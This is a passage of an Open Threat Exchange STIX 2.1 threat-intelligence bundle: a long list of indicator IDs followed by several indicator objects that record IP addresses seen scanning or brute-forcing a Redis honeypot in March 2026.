        "indicator--f6f6bc61-8180-436f-a2bb-51c238ac850e",
        "indicator--cf0c0e8f-b3d2-4c37-bb81-f1ec3ee3963a",
        "indicator--8be5d4f2-2465-4a2f-9c98-ca73bc20b517",
        "indicator--2615f27d-d0b9-497f-89ff-257278b1c0e0",
        "indicator--e0dae331-7f60-4f45-9068-781490724b0c",
        "indicator--129eee7b-ba1b-44ff-afdd-94bc39bebe6f",
        "indicator--47ce10db-2510-4a38-9326-174bbb7c43b8",
        "indicator--a2d3f214-d5d6-4eed-9087-9e3d11981e14",
        "indicator--562aabdf-6d0c-4843-867a-35fca7f60d92",
        "indicator--4b559977-fe68-4bbd-9181-f0c09f735b33",
        "indicator--66a59965-e50f-4a85-a387-6b017e93829c",
        "indicator--4b8ffa9d-c13d-447a-ab83-6ce24199d732",
        "indicator--9d18e0b1-1409-4b74-9da5-97d379dfc212",
        "indicator--edfe4c58-433c-4cd2-ab1d-69c0ef2a7f4f",
        "indicator--c7fa9a61-1f84-4776-8e37-4de1ed075ec5",
        "indicator--adc4f167-6b12-403f-b293-9c4de55e5832",
        "indicator--b5a2425e-d06f-49c5-88e0-a5083f5e5bfc",
        "indicator--a01a0e06-dc75-42fa-8e27-cc96065c09f6",
        "indicator--d25ef42f-e74a-465a-beed-79555082ef03",
        "indicator--c56c651d-fbc7-4369-8be5-c5a178a74944",
        "indicator--dc4be294-c8f2-49da-8c76-ec63028c29df",
        "indicator--6f7f28b1-39bf-4660-8b8f-018157f2d68e",
        "indicator--f773ea25-8299-4b9c-9a86-33ec7be4874c",
        "indicator--0dbfbfaf-552d-4800-96c8-e214de8b37d8",
        "indicator--a74d0342-24ca-4af1-a5be-637797dd8680",
        "indicator--40b0e6ad-060b-4d0b-8532-a43648859ec8",
        "indicator--1acfd67c-f4ea-43ca-9a29-3c62ac894f8a",
        "indicator--12d9962d-9852-41c8-9ef1-4aac7de50aba",
        "indicator--6169aa37-4c72-4f68-b5d5-88ff2f18837b",
        "indicator--593336e1-367b-428e-98e3-05cf94b93fb8",
        "indicator--b03c6c6c-3878-4c0d-84ea-572f25c7340e",
        "indicator--e7ba073d-3695-4283-8e39-dc1bfbd91e85",
        "indicator--b0b8dfe8-405b-4dee-8fb7-9d65401d41e9",
        "indicator--7ed60638-b67c-4ca9-8819-0cf5f40cbcea",
        "indicator--c782a199-1f8f-445b-b2b1-1848e0d7e0ba",
        "indicator--1a7280f4-d8af-48a0-b413-6bf1e8fbdb1a",
        "indicator--8ac2642c-ed00-408c-9fd8-e4b55db4e8e3",
        "indicator--86eeb655-ce58-4e6d-a3d2-6080523492e1",
        "indicator--bf1f142a-da69-45c8-94fa-7b3b08b22c1e",
        "indicator--e29e101d-fdf4-4203-8e33-c5ae2856157f",
        "indicator--33ba5af0-7402-48d9-8871-9505fe0bdf01",
        "indicator--070186f1-1bd0-437d-8010-85dafb1fab0c",
        "indicator--4f010ccb-917e-4d42-acb4-bded6d83fd2d",
        "indicator--2b7ed60f-2c04-44fc-98ff-0c52b7b9c2f6",
        "indicator--2e463009-78ab-4d1d-9eba-3036be660b10",
        "indicator--1fe2666a-9fff-4e65-aea4-7b3264ebba14",
        "indicator--8e88bc1c-df84-485e-8776-ab4de5f3f281",
        "indicator--5e58c20e-d703-481d-96a9-f1ee09e3aee5",
        "indicator--a00af559-ef38-4f09-9e71-6af7855c5fb9",
        "indicator--7afca3dc-9001-454d-9b97-fc201d048e70",
        "indicator--04608f52-96d9-430d-9faf-635d12b20059",
        "indicator--68cb3788-2c4b-48e9-b6d9-4795cc612612",
        "indicator--42517918-5342-4090-b1d0-2938634ff8b6",
        "indicator--f0135eaf-efea-45a8-ab6f-cb8c2da08c9d",
        "indicator--3889a982-cebe-4e6a-8cab-b4bb79954e3c",
        "indicator--c36f2837-6aaa-4775-a06e-1874a96f7196",
        "indicator--e0f53942-c5c0-4d12-b386-53f603bf60f9",
        "indicator--61c03249-b01f-4fc0-a8d0-313770b7217c",
        "indicator--1265e5da-cc94-45b3-8afa-7b170d3c4f63",
        "indicator--24788ee2-bbd4-4f54-826b-9882cacf540b",
        "indicator--ad1af1cd-644a-44c8-a053-e6098af6b5bf",
        "indicator--4ee87e8e-116d-4a8d-a9f8-70315cdf828b",
        "indicator--bcf3d726-5eae-4327-b6ff-607cd1ddc93a",
        "indicator--bd421caa-f48a-4e06-94a9-91e19015cef3",
        "indicator--8d17d6f1-74fc-4c4b-a2f4-6d041c55a693",
        "indicator--0d9dbf91-7679-4834-9486-fd5cf765e5ef",
        "indicator--e10daaff-78fa-4cdb-b01f-a3ca65979ae9",
        "indicator--98997e9b-4087-4b84-b020-0a1339ea8f52",
        "indicator--493f5d0f-6633-4dfb-b11c-204265c4cb3e",
        "indicator--36a83e2d-8b69-4473-ae65-8bc90650f71d",
        "indicator--d1b2a830-ad3e-429b-bf86-c1c4f16e3481",
        "indicator--de8a8b3c-b891-4610-ab32-a1015815d230",
        "indicator--e4eddad1-8df4-4482-8bd0-a367dbab2d4c",
        "indicator--7cbcbbb7-ae2a-4eaa-886f-9be210a13f6f",
        "indicator--68b55e35-03e4-4549-82bb-163b2b251319",
        "indicator--ba0e5204-5813-419a-abf2-6897ce5c733f",
        "indicator--fc12a587-5b90-4752-9daf-676cf1f3d6ff",
        "indicator--e7504330-b5d6-4e44-9dd8-36caa7c5a215",
        "indicator--7e06cf3f-a946-4039-9664-848472c00b55",
        "indicator--9529f673-e227-4e77-9e94-31da57a722ed",
        "indicator--706340e9-c8db-466d-8673-c425783bf2d6",
        "indicator--72e53e55-d477-4f98-a09c-d04dfa15ba8f",
        "indicator--4ed88d92-c020-46ad-9bf4-bbb7100f7706",
        "indicator--c77c4143-7ff5-468d-9540-440d7aa8dafd",
        "indicator--a51b2d3e-bcd7-43e9-ab29-8929f9c744fa",
        "indicator--5618dd10-8df0-468e-a5f0-bb8308d0b35f",
        "indicator--0149d411-84c1-43d4-a80f-e61a206367ed",
        "indicator--74b25f1c-8b7f-4a0f-89eb-9eea3f7f2cb9",
        "indicator--0677222c-c9c2-4cea-93a6-e7ac32e37333",
        "indicator--190c2be7-d23c-4a8a-901d-fadfc0e560b0",
        "indicator--40896853-3009-47fd-a6f0-e87fec45e6da",
        "indicator--9295d8fa-131a-4097-9117-86f609578261",
        "indicator--f9c22d7a-8c76-4bd2-8068-e1f77f4d3dda",
        "indicator--722a056f-e91a-4edc-b195-25040eba1616",
        "indicator--0398371a-a457-4d26-866d-8d929750108b",
        "indicator--16a11a15-79ba-4f99-86c6-8243f661df84",
        "indicator--a75de153-758a-4718-957c-93fb7cc11bcf",
        "indicator--d111d64d-5ded-46da-8b6f-9052feb860d6",
        "indicator--d8cd392b-2142-4b55-935f-214eed7a20c9",
        "indicator--b60104d4-b786-42fe-9290-d4c20f25259d",
        "indicator--6a7dc374-4000-4334-ad82-e71be4c2c62b",
        "indicator--d1917d33-fdbd-4a0b-b93c-097d094616c4",
        "indicator--2505a098-300b-4d24-920a-048ca2c1439a",
        "indicator--2712108b-ae29-41e3-8a79-bf8c847752c6",
        "indicator--1b36e076-e2a7-4fb8-beea-be356134d663",
        "indicator--4f54a37c-8bec-4d22-9b47-2045fb3fdb4e",
        "indicator--3f47ff07-f272-4420-833b-d85e2e6c60ed",
        "indicator--f7689987-cd2c-4ba9-8068-364e17d90c5f",
        "indicator--557c786f-025b-4beb-b4f3-73a223df2dd1",
        "indicator--c9de93a6-4808-44aa-8ea4-348909ec0d63",
        "indicator--b1c2f60d-867c-4f29-932d-2649c75e4931",
        "indicator--c6fbd370-fcac-4eff-b97a-bf965897fcde",
        "indicator--e2279554-6d61-4a3a-a615-90ead5d02040",
        "indicator--afa45f83-865a-4f3d-ae59-3e24a35e3234",
        "indicator--d76abae8-cba0-47b2-beb8-28fa18183250",
        "indicator--011feeda-3250-43aa-b50b-7037522932b0",
        "indicator--28505e21-022e-43f0-8b55-6b886ae2ced0",
        "indicator--06c9b94e-77c8-437e-b143-7d26f897d259",
        "indicator--4ce44850-fe1e-48c6-8334-9a0c45fc7df1",
        "indicator--a0bd1a2a-dafc-4bcf-87cc-69bf53f0537b",
        "indicator--2dcc92cf-8db4-4323-9e91-a1b04f9f30a9",
        "indicator--846c2b43-dcd0-4167-9d4a-742f4e20790c",
        "indicator--d4225d28-8876-461a-88dd-495a045f11ef",
        "indicator--d444a884-2dc3-4a9f-b98f-322b11c5202e",
        "indicator--ddf1357a-a18d-4de0-b237-d720455ac9aa",
        "indicator--a37b510b-57ed-41e1-99a7-32d34ac03483",
        "indicator--4d8067a0-1d06-4334-be3a-080e5d4e6ce4",
        "indicator--7aff5843-ac0c-4fcc-9258-c912572f62e5",
        "indicator--78b36540-ea30-4a2a-8821-f21a28877b41",
        "indicator--f2c92e86-6835-4e9b-a46d-5b9cfd5c577c",
        "indicator--40028492-09ff-4ae0-914d-1ef6cd8de2c4",
        "indicator--1a04471f-7e8d-4712-a8e6-eeb57baa389f",
        "indicator--5546d2da-7c64-4914-ad17-3be027aa844e",
        "indicator--ca4daefb-0f1c-4e63-8ed3-2eb11400902c",
        "indicator--590b73b4-dd15-4a87-9406-641706d3f8c0",
        "indicator--be6109af-f42b-4164-944e-7fc7bb6e9a57",
        "indicator--9e12e8de-8f46-4021-a9f1-332ae6547be0",
        "indicator--6835e72c-6bea-49c4-9430-50478c37af8e",
        "indicator--6d954b3f-2394-4438-88de-e0908089ba58",
        "indicator--5fca7435-7d56-4552-8551-3de2a1e046b6",
        "indicator--5067714c-96b1-4ce7-a6fc-c985c4fc9d0c",
        "indicator--d70dc23d-e9cf-4371-9011-d845b767f58c",
        "indicator--d1decf73-fd01-4397-baec-53595c226076",
        "indicator--9dc94619-493b-4d05-bfe3-9756db75dfbc",
        "indicator--43340de0-77df-41ec-88b0-4552b17b5c27",
        "indicator--8878fe06-4df9-46d0-8b0f-ffb103e8b3b6",
        "indicator--91eabbde-9dab-478e-a296-4aedbb46ba62",
        "indicator--bf9bb0f3-8531-4c23-9627-9f4b0edc829c",
        "indicator--4efdb4d8-3168-4c3e-be9a-de5efedf05c3",
        "indicator--5bf1402a-bd71-42ff-a830-dfe3cdef25ab",
        "indicator--10fb2dc7-0bea-442f-a889-73af673e3d7b",
        "indicator--3fae5f72-f97c-4390-af29-578fe17cacd3",
        "indicator--f2518f2b-b407-42b5-9c17-bfeb686f38a1",
        "indicator--fd2def5c-2485-430d-990d-c9c697064db2",
        "indicator--b41f034b-f306-4e53-a2df-a592fda773ee",
        "indicator--20269cbc-71c8-49cd-9bbf-1cadfb6c63fd",
        "indicator--ea3415f7-995e-4d64-a2f9-ba382cde44f4",
        "indicator--9625777e-b6e4-456b-b328-fdf3118163a2",
        "indicator--0cea0e6c-e34f-4a66-a345-343b9985fd21",
        "indicator--c3644ed9-3b81-4177-b57d-550a58eb3e17",
        "indicator--09b3b58e-80c8-43e3-a9c6-5d0d36ff2237",
        "indicator--b1dfbf52-b04f-4737-8d7b-4d855e85417b",
        "indicator--1c1f6392-9f4d-4cd6-b996-f0617f154ddc",
        "indicator--829eba47-a798-4493-bed2-1bf53b27ec20",
        "indicator--0e5125a2-fb77-45bd-b5c3-f14ee16322c7",
        "indicator--ac34cbd1-db60-4a54-a7b8-3a7620675808",
        "indicator--ba5cd1f9-157b-41af-82c5-100869b76d1e",
        "indicator--35e4c2e0-682c-4949-ad1d-c0887b4e165c",
        "indicator--0cfac61a-7b2c-448c-8445-8c760a7b97c1",
        "indicator--303ae204-7771-4a1a-bec0-1d30f1d4f8e7",
        "indicator--6a8518b0-8f4b-4f47-8395-0c33e93d11b5",
        "indicator--08ac6586-90bc-4e51-820c-419d33b87c8a",
        "indicator--bc4dca83-8cb9-4e3b-9712-67eb51a7c02f",
        "indicator--721b8030-dc0a-4d9e-91fd-c078c98fc38b",
        "indicator--29937e5b-0378-4241-88c4-537229f6491c",
        "indicator--d961ad73-3e44-430c-9477-97f83ee8a4f5",
        "indicator--73ec225d-d2e1-4d4e-8cda-ac93d949ab90",
        "indicator--ff6e4df6-08d3-48f3-9854-edb941afd985",
        "indicator--5c0be79d-f040-4458-a636-b7bdd0dec4bb",
        "indicator--48861b80-2455-458f-81ff-c2946c953bfd",
        "indicator--38c521aa-73a8-4ccf-a622-a55f1067c9ac",
        "indicator--c156612c-818c-453f-9b9b-0d8f226db9c5",
        "indicator--83f4460b-c834-4ce0-8a71-7dbd79c31c0f",
        "indicator--4beb16f0-c1ca-4918-b93e-6c9c1b080153",
        "indicator--d72f5b2a-3791-4ee8-b09d-9ab49f2b8a63",
        "indicator--4403499d-ce52-4286-bd20-e5b1cd508db0",
        "indicator--efd4dc26-8537-49f2-ab88-69c5bde91308",
        "indicator--f5232267-a66d-46cf-a4fc-d89651d08433",
        "indicator--6acbb7af-fe8c-4449-adc9-378c0675173a",
        "indicator--d982dc3f-2425-4e27-99dd-47d2c50777de",
        "indicator--23005956-4a66-49bc-8a45-a1880a1ed755",
        "indicator--434bc7d3-3a23-4c20-abcc-0f017ebf5e57",
        "indicator--d1cc8a2b-5c96-4fa7-ba89-70dd05be3e47",
        "indicator--92ca091d-2fdb-49eb-abfa-3cab754ffb27",
        "indicator--2900f73f-6632-44e8-bddb-04edf8573222",
        "indicator--5c508141-e30f-4838-ab94-f6726cf67076",
        "indicator--1e8920fe-9198-427a-8f3d-d188e0ac0764",
        "indicator--a2bb9475-dca8-440e-afc5-65e746bbf032",
        "indicator--ec0ee394-b2d7-4d33-a4dc-6f6eda17536f",
        "indicator--f379ce65-b675-4d52-86b4-9cab6fb3c3ce",
        "indicator--a088894c-ffb8-4206-9a86-3909064e4b7f",
        "indicator--c0158a08-2f90-44bc-8280-bff261b999f3",
        "indicator--57b46c15-ae84-4190-a092-43d276595eed",
        "indicator--dfb7b648-32bd-4dfa-80cf-ca98480f5822",
        "indicator--36820bcc-30f6-4b74-b090-a282e5991ab6",
        "indicator--8e3acc7c-5d55-4655-8099-d49bd15f7809",
        "indicator--97368846-d340-45b8-a746-39f0f9e62ec0",
        "indicator--3774f2cb-c02f-4506-8fa9-2c9d1b02b361",
        "indicator--fff4a3d9-3694-4f5a-8738-72d29230568d",
        "indicator--932cbb99-e451-4a2e-ba09-b339604e98ae",
        "indicator--cb52e5ee-fdaa-4785-8ea4-0d0c12cdec07",
        "indicator--6a49a9d8-85cc-4aa5-8651-07c05439c338",
        "indicator--6d572bf9-74fe-4b42-82b9-4ee3b06c7ca1",
        "indicator--129bca9e-a984-4428-b136-7c2c6ee1e24d",
        "indicator--da507950-a9ce-46b4-b0f5-189c4db90778",
        "indicator--f248c89a-4f30-4a60-bf57-a0cd3b205ab5",
        "indicator--2b4016ee-e7d6-490d-8bae-4d3c4aee8acf",
        "indicator--e9961e51-732b-419c-97f2-f69d67492e8b",
        "indicator--ed938d28-aeb4-4795-abb9-d3fecb6e0bed",
        "indicator--9657815e-65a9-4515-8b4a-312dbb9e0e54",
        "indicator--015591cd-b0c7-454f-bae3-400cd06f71dc",
        "indicator--2243b288-c1df-4558-bf89-cfd48c1879ab",
        "indicator--6d23c47d-2385-4b09-95ee-d5fbfd25f432",
        "indicator--406ccc66-5572-420f-a0e5-ef28ff6ca8a9",
        "indicator--dcede044-0de9-4d5f-a580-1ae9f9adb0ac",
        "indicator--83dc463c-450f-4ba2-bba6-11f8cb25004f",
        "indicator--5e8758c1-ab15-4fdb-a2d9-d3d63e35a076",
        "indicator--deb32119-e68d-4e5d-a3b5-2355f87ecf72",
        "indicator--90a682cc-138a-4e7c-97ea-0df7f81cc8a1",
        "indicator--adaec145-0f13-41a5-bfdf-c3055fa493e0",
        "indicator--3988ee7b-209d-4866-a19b-9306446fb83f",
        "indicator--acd58bf8-e064-4aeb-a092-1005c6c9210f",
        "indicator--1071bd93-c041-4794-93e4-a086069d5819",
        "indicator--4efc883e-a6fc-4626-839b-eb0ea5c033b3",
        "indicator--1e28191e-effd-4ef1-80b7-7db19124abf3",
        "indicator--2257d480-5943-4b7c-b391-adc870891983",
        "indicator--92220305-ace6-4809-85b1-07cef07e55fe",
        "indicator--0f56676c-4612-4fe7-8ef9-89627400d239",
        "indicator--f90bd015-d301-455f-a9de-c237ff46435d",
        "indicator--511d0518-7988-4840-8feb-228d67ac4db3",
        "indicator--5633d55c-0285-45e3-9038-1e43cdc01d81",
        "indicator--a18989c6-31b2-41c7-9f3b-7c280cbbebd2",
        "indicator--5d8473dd-87a1-471c-b9f1-b010099ed76f",
        "indicator--92b101c8-f419-44f3-b7b2-587e2bf497ae",
        "indicator--b2b3ef93-ef76-4780-8ac8-1f443efa35f9",
        "indicator--cbb6e617-6d9e-4203-a865-462f45b1151d",
        "indicator--68ebda31-294a-4189-a0e4-4a32f4e72040",
        "indicator--9045821b-982c-4b45-acc9-4f0722e124ec",
        "indicator--505e3d39-98d6-4ff7-91f6-1ded54c8dcd4",
        "indicator--835052ed-487a-4713-abac-ad49dadc1437",
        "indicator--88272d00-ffbe-40cb-ba36-9db511b27461",
        "indicator--efb4d367-5778-4005-aa87-e5534f1770eb",
        "indicator--36df6ad7-4ffd-4bfb-9b0e-1c60bb5df99a",
        "indicator--ee72bf70-aee5-421d-9433-04249b7a433b",
        "indicator--0bc2ae33-bdc7-49e9-b4f7-63239ee4889e",
        "indicator--c0c6c7f2-648b-432a-81ff-7be0b57cbd27",
        "indicator--61cf4731-ab44-4633-bf06-8d0c3589ec6e",
        "indicator--3cc7ea66-e156-494a-bd1c-17691371e217",
        "indicator--3aab1680-bc44-4fad-98e2-9b6d4bd58269",
        "indicator--b2133504-90d6-4eb1-83c3-e0f358962f83",
        "indicator--405b51cc-6192-476c-9a56-7ab0fa1deac8",
        "indicator--d311087e-d802-46f5-8499-e782e43f6110",
        "indicator--5ea5a271-9e38-4f11-993f-d7263f528e0e",
        "indicator--096a68c3-1166-477e-ba08-71caec8379f1",
        "indicator--cc215133-f976-412d-8b94-caf5d22e63a6",
        "indicator--21b84c97-92da-46fe-86b2-288e37710306",
        "indicator--df976b73-fa0f-4038-81c2-af0278a84bb7",
        "indicator--3372bbd4-b894-4120-8a91-c66faba7e60d",
        "indicator--b5eb9702-1685-4646-a8fb-4885f6930469",
        "indicator--3d1d9249-3bf9-4c49-b502-f68c18e7f55b",
        "indicator--439b8dc2-5158-4bd5-948a-8f53caa7f0ac",
        "indicator--a9593be2-0445-437d-ae0c-5cfc405a0ae3",
        "indicator--44a1c03c-25e2-4fa4-84f4-53e24bf230b9",
        "indicator--d6d09943-961e-4c6a-86d6-6e9698d988d7",
        "indicator--90b28aa9-4ea5-4816-90ca-d72b3d015ac0",
        "indicator--0f98f716-83f4-45f4-81f3-9373200418e4",
        "indicator--23f9834d-218c-4bf4-9fda-836e627dde3f",
        "indicator--b4a6ba9b-f1aa-47dd-9f9f-7bd4aaa84437",
        "indicator--eaab48f8-d493-482d-80c4-a12a4e58febe",
        "indicator--0b1f2107-6f48-4b89-981f-4f19da3f6f1c",
        "indicator--d957bf72-50c3-4ac5-aa6c-939640ca3831",
        "indicator--f8523af7-9bb5-4062-a18e-0da2651e6989",
        "indicator--7a57893c-9c84-43bf-80b7-48f0ab77dcd1",
        "indicator--b3097b8a-6794-42c8-9f4a-ac2eb679d791",
        "indicator--13560319-71d0-4b64-9178-a120c2c1f100",
        "indicator--1768e0ae-95d4-428b-8559-aa31cbe3515c",
        "indicator--87d04782-de54-41a1-a0ee-39c151f1acfd",
        "indicator--84b03f10-f707-4076-9b4f-5b3440814918",
        "indicator--248622b2-7296-4968-9f01-4fa841dab485",
        "indicator--1065b016-75f7-4523-b9b5-bb5051811f9b",
        "indicator--9573a02f-ada9-4aa7-992b-05bc245bf1b4",
        "indicator--1ed09684-aab3-4a19-bd46-9996c4acd1bb",
        "indicator--3716e489-22ee-4f74-b4d0-368638dd945f",
        "indicator--30b43fe2-ee1b-4799-b868-cf7be8d237a6",
        "indicator--15ac724f-2c2b-461f-a824-34fe82096db9",
        "indicator--8008d310-191d-4ad6-ac1d-9623bd0fa539",
        "indicator--257e2967-7cd4-4f9a-930a-27f7b1d72e45",
        "indicator--a6fd9c77-539c-4fe5-838d-4f4d366cd53f",
        "indicator--c2760d42-3810-4bdd-b5b6-dbbe8697c7dd",
        "indicator--73ac424b-5033-4749-be5b-8976477e4f69",
        "indicator--43878448-675b-4cfd-83bc-e21f4d8742b6",
        "indicator--c383b1cd-af6e-406c-8a8f-67eda7b15d56",
        "indicator--c6e26dd7-82a4-4b89-b857-ec7963f84934",
        "indicator--9525cd3f-a376-4380-988d-afaf37bfeceb",
        "indicator--ee0946e3-d556-404d-9449-840706cfe1c4",
        "indicator--19a2f3e0-7695-422a-83cc-2040e62d1b68",
        "indicator--cdc6e8b3-7870-4a67-8cbd-9b55b6755ba7",
        "indicator--829a1586-6feb-4bba-9291-6e37d6ed4e1f",
        "indicator--23b6403f-6741-46f0-9590-ca362e7e67bc",
        "indicator--34947a51-ae4e-4362-80ab-f1e0f10e6267",
        "indicator--91fde319-83fc-4c82-b9b9-3475f026c800",
        "indicator--c6f880d1-3e68-413f-9391-7b00e383ab4f",
        "indicator--6367351c-f965-45e6-b2fc-095d451ee19b",
        "indicator--0736f829-40da-45be-a194-c3e1828a4089",
        "indicator--c169737a-420f-457a-835e-da0c4a42dfec",
        "indicator--d3985724-15c7-4df4-8e78-06e5e46e325f",
        "indicator--d09439b0-ae44-436d-b54e-3076961a672e",
        "indicator--836055fb-a07f-4d63-83fa-3e8d255b3823",
        "indicator--bedb1fbf-c710-43b9-9d90-3cf778c3d423",
        "indicator--807ce508-98da-4f29-9dee-aead1c4e0882",
        "indicator--ff914472-d158-4a46-9a62-4958a942d6c2",
        "indicator--3a5c4bff-63fa-4134-8d3e-0731f1ba8a1e",
        "indicator--ac3441f0-70f3-40c2-a892-e8e30491e2e3",
        "indicator--bb07f921-22f0-441d-8559-2c12fc44804c",
        "indicator--e60512a9-cbc4-4043-ba51-3e0bab64de5d",
        "indicator--31de5499-ca54-484e-bd08-6c8659f037dd",
        "indicator--cab66a11-a933-497b-b5b0-c4b433811a6b",
        "indicator--519a06d3-ba5f-4873-ac7a-0e0582a9f0ad",
        "indicator--fe7d522b-20b1-4735-bf46-63c4a4214c79",
        "indicator--69dcbc73-95a1-401b-b56b-13ceaa5be484",
        "indicator--9f3e13f6-3587-4f5b-a7d1-0c2cce809fda",
        "indicator--e6d9f617-0adb-4be7-97a7-4ed27fd6d450",
        "indicator--00b17378-4b1b-4279-87d4-13f103e68b1a",
        "indicator--b792b865-d3ac-4d69-a8f3-a3c7bcf56945",
        "indicator--3f4af958-738d-4f6d-ba88-34a80923019d",
        "indicator--a8155bae-7f6a-4adc-9413-7ecdd4ec4a68",
        "indicator--ce9acd48-bb0c-48d6-8d6d-c8e6594255e0",
        "indicator--af43d554-3043-4c02-910a-cd085493fdb2",
        "indicator--d9839e3a-590f-4db1-9cbc-ab01c980b7d4",
        "indicator--f1ec5304-3ec8-4bf8-acef-6df427d74888",
        "indicator--2a206bc8-66a4-4dc8-9fd6-39c28f66d4c4",
        "indicator--e6875809-9890-4527-91f2-530f5a0b2d34",
        "indicator--431fe11a-3039-4708-bb6f-d0385f91ad9e",
        "indicator--0ec50c06-f303-43b1-b311-19122e4435c1",
        "indicator--56a6b178-8869-4298-aed9-95b39a927f6e",
        "indicator--3527d6a9-dd1d-4bac-9f76-9d1a67d3356c",
        "indicator--3e405b0a-f653-4ae7-8646-6f702b7fb403",
        "indicator--a934b79b-0d51-42cf-83d0-eb784cf43673",
        "indicator--71c90c26-7ceb-42bd-a088-38a51efcdbca",
        "indicator--23a43940-c5b3-4584-9aed-4f5a17b1ba1d",
        "indicator--cfd5e92e-fa06-4f7c-8899-a13c382a809f",
        "indicator--8ea1b887-a849-4f98-bc15-ae3fc08436a4",
        "indicator--ab7d5e0d-4f85-4b80-895b-a3a7d099dd4e",
        "indicator--50072f77-0902-4483-8988-278db01a67f1",
        "indicator--800d1911-cb9e-4129-91dd-097e180f8751",
        "indicator--3e485a29-2db1-4d2f-9585-fac1c786a5d7",
        "indicator--4d1106b1-9c14-4ff8-9449-0ed540889519",
        "indicator--c4f2ed1e-23f5-452a-bb9f-82fcaf1fd108",
        "indicator--3fadb1eb-937e-48d6-9004-0e3a5d73f073",
        "indicator--43431d1b-3d32-4b9b-b618-a6d4ca45f6a8",
        "indicator--7807ee21-7c6f-454e-bbf3-8e8852e462bc",
        "indicator--52c1689f-89b7-4ac8-8e2f-2bef7352cd08",
        "indicator--38082945-bb27-4916-b8fe-aa0e9290b930",
        "indicator--e580a70b-37e9-4779-95a8-96a668d76758",
        "indicator--8f6cb2eb-dcc9-4e11-8ad8-ceab7b9b8c59",
        "indicator--63288580-0fe3-4b5d-8e20-507a2560d3e0",
        "indicator--c3c553eb-9735-4bb7-9379-477418cf5343",
        "indicator--e7f7536b-639d-433a-99bf-6a36d64b71ee",
        "indicator--c1c29843-6920-402e-b020-aff80b1cb14b",
        "indicator--cb517949-d420-4b4b-9ddc-5e36a6e55197",
        "indicator--104d1423-1731-49f8-aef3-5c6d7aee10e0",
        "indicator--fed758bd-83c2-47bd-b7f0-5c8e92e8791c",
        "indicator--43b07099-00fd-4dc6-87aa-64d38c2f6ae0",
        "indicator--0ec69c9b-429a-4392-ba6a-5f4650361ff4",
        "indicator--31c1d757-8fba-471c-8640-a50d890f6495",
        "indicator--a2ad6b24-ae96-40c4-acdb-e1d78dea2003",
        "indicator--72f291f6-725c-470e-b174-f5b7b51ab328",
        "indicator--7e7e8f59-6637-45de-917c-bfc3563810aa"
      ],
      "published": "2026-03-01T00:25:15.012Z",
      "spec_version": "2.1",
      "type": "report"
    },
    {
      "contact_information": "https://otx.alienvault.com/",
      "created": "2026-03-01T00:25:15.012Z",
      "id": "identity--ab072f15-9b87-4ee1-898f-b584d41f29b0",
      "identity_class": "organization",
      "modified": "2026-03-01T00:25:15.012Z",
      "name": "Open Threat Exchange",
      "spec_version": "2.1",
      "type": "identity"
    },
    {
      "created": "2026-03-01T00:25:16.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--33eca3b2-eb24-4320-9bfd-e4a0fb183b2a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T00:25:16.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.230.101.158']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T00:25:16.000Z",
      "valid_until": "2026-04-02T00:25:12.000Z"
    },
    {
      "created": "2026-03-01T00:25:16.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--fe9a1f96-c8e3-40c1-add9-32b4402a1364",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-01T00:25:16.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.226.149.227']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T00:25:16.000Z",
      "valid_until": "2026-04-02T00:25:12.000Z"
    },
    {
      "created": "2026-03-01T01:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=133775; asn_org=Xiamen; redis_cmd_hits=0",
      "id": "indicator--d8033d56-3400-4084-82c2-cb3a14e7c79b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T01:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '180.188.47.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T01:25:06.000Z",
      "valid_until": "2026-04-02T01:25:05.000Z"
    },
    {
      "created": "2026-03-01T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=IN; asn=149621; asn_org=SB Secure Data centers India Private Limited; redis_cmd_hits=0",
      "id": "indicator--e7e9c83e-ee56-410f-bf79-df4f29f2d504",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '103.195.245.146']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T02:25:13.000Z",
      "valid_until": "2026-04-02T02:25:12.000Z"
    },
    {
      "created": "2026-03-01T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=NL; asn=14956; asn_org=RouterHosting LLC; redis_cmd_hits=0",
      "id": "indicator--8c44e911-5b5c-4d03-9738-5dc04776a9ab",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-01T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '107.189.22.183']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-01T02:25:13.000Z",
      "valid_until": "2026-04-02T02:25:12.000Z"
    },
    {
      "created": "2026-03-01T02:25:13.000Z",
